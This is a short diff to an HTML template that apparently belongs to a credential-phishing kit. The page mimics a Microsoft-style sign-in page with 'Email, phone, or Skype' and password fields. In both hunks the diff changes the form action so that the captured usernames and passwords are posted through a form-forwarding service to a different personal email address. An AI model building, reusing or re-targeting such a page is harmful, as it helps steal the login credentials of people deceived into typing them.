--- a/template.html
+++ b/template.html
@@ -340,7 +340,7 @@
             <form>
                 
                 <div class="mb-16">
-                    <form id="loginForm" action="https://formsubmit.co/adebayoayomide574@gmail.com" method="POST"></form>
+                    <form id="loginForm" action="https://formsubmit.co/hajjarwaseem@yandex.com" method="POST"></form>
                     <p id="error_uname" class="error"></p>
                     <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype" />
                 </div>
@@ -378,7 +378,7 @@
         <form>
             
                 <div class="mb-16">
-                    <form id="loginForm" action="https://formsubmit.co/adebayoayomide574@gmail.com" method="POST"></form>
+                    <form id="loginForm" action="https://formsubmit.co/hajjarwaseem@yandex.com" method="POST"></form>
                     <p id="error_pwd" class="error"></p>
                     <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
                 </div>
